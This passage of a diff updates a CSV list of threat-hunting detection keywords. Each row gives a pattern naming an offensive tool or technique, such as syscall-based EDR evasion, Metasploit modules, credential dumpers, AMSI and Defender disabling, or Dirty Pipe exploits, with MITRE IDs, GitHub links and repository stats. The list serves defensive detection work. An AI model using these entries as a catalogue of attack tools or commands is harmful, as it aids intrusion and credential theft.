Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*Direct_Syscalls_Create_Thread.sln*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*Direct_Syscalls_Create_Thread.vcxproj*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" "*DirectDLL_x64.dll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*DirectDLL_x86.dll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Directory-Traversal-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" -"*Direct-Syscalls-vs-Indirect-Syscalls.git*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*Direct-Syscalls-vs-Indirect-Syscalls.git*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" "*dirkjan@sanoweb.nl*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" "*dirkjanm/ldapdomaindump*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*dirkjanm/PKINITtools*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -9288,26 +9436,26 @@ "*dirscanner.py*","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","5","499","114","2023-09-27T04:40:54Z","2021-08-18T08:58:14Z" "*dirscraper*","offensive_tool_keyword","dirscraper","Dirscraper is an OSINT scanning tool which assists penetration testers in identifying hidden. or previously unknown. directories on a domain or subdomain. This helps greatly in the recon stage of pentesting as it provide pentesters with a larger attack surface for the specific domain.","T1596 - T1530 - T1201","TA0040 - ","N/A","N/A","Information Gathering","https://github.com/Cillian-Collins/dirscraper","1","1","N/A","N/A","3","212","34","2019-02-24T12:22:47Z","2019-02-21T23:06:58Z" "*dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*dirsearch*","offensive_tool_keyword","dirsearch","Dirsearch is a mature command-line tool designed to brute force directories and files in webservers.","T1110 - T1114 - T1100 - T1313","TA0001 - TA0007","N/A","N/A","Web Attacks","https://github.com/maurosoria/dirsearch","1","0","N/A","N/A","10","10324","2209","2023-10-03T11:22:52Z","2013-04-30T15:57:40Z" -"*dirTraversal.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*dirTraversal-nix.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*dirTraversal-win.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*dirsearch*","offensive_tool_keyword","dirsearch","Dirsearch is a mature command-line tool designed to brute force directories and files in webservers.","T1110 - T1114 - T1100 - T1313","TA0001 - TA0007","N/A","N/A","Web Attacks","https://github.com/maurosoria/dirsearch","1","0","N/A","N/A","10","10325","2209","2023-10-03T11:22:52Z","2013-04-30T15:57:40Z" +"*dirTraversal.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*dirTraversal-nix.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*dirTraversal-win.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*dirty_sock*","offensive_tool_keyword","POC","dirty_sock: Linux Privilege Escalation (via snapd) In January 2019. current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/initstring/dirty_sock","1","1","N/A","N/A","7","640","159","2019-05-09T21:34:26Z","2019-02-12T06:02:06Z" "*dirty_sock/archive/master.zip*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*dirtycow*","offensive_tool_keyword","dirtycow","Linux vulnerability name to go root CVE-2016-5195) Dirty COW est une vulnrabilit de scurit du noyau Linux qui affecte tous les systmes d'exploitation Linux. y compris Android. C'est un dfaut d'lvation de privilge qui exploite une condition de concurrence dans la mise en uvre de la copie sur criture dans le noyau de gestion de la mmoire","T1068 - T1055 - T1574.002","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","multiple pocs on github and others places ","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Dirty-Pipe/exploit-static*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" "*dirtypipe-exploit/blob/main/dirtypipe.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit","1","1","N/A","N/A","","N/A","","","" "*-DirtyPipe-Exploits*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","N/A","N/A","5","453","129","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z" -"*dirwalk.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*disable_clamav.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*disable_clamav.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*dirwalk.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*disable_clamav.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*disable_clamav.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Disable_Privilege /Process:* /Privilege:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*DisableAllWindowsSoftwareFirewalls*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" -"*DisableAMSI(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*DisableAMSI(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "*DisableAntiPhishing*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*DisableAntiPhishing.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*disableeventvwr/*.ps1*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" -"*DisableKerberosSigning*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*DisableKerberosSigning*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*DisableMailboxAuditing.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*DisableMFA.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*DisableRealtimeMonitoring $true*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" @@ -9345,7 +9493,7 @@ "*DiskCryptor Device Installation Disk*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*DiskCryptor driver*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*DISKCRYPTOR_MUTEX*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" -"*diskcryptor2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*diskcryptor2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*DiskCryptor-master*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*dist*_brc4.x64.o*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*dist*_brc4.x86.o*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" @@ -9356,36 +9504,36 @@ "*dist\shadow.exe*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*ditty/ditty.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SimoneLazzaris/ditty","1","1","N/A","N/A","1","2","1","2022-03-10T16:15:14Z","2022-03-09T09:20:27Z" "*djhohnstein/SharpChromium*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" -"*dlink_central_wifimanager_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*dlink_sharecenter_cmd_exec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*dlink_telnet_backdoor_userpass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*dll* [HIJACKABLE]*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*dlink_central_wifimanager_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*dlink_sharecenter_cmd_exec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - 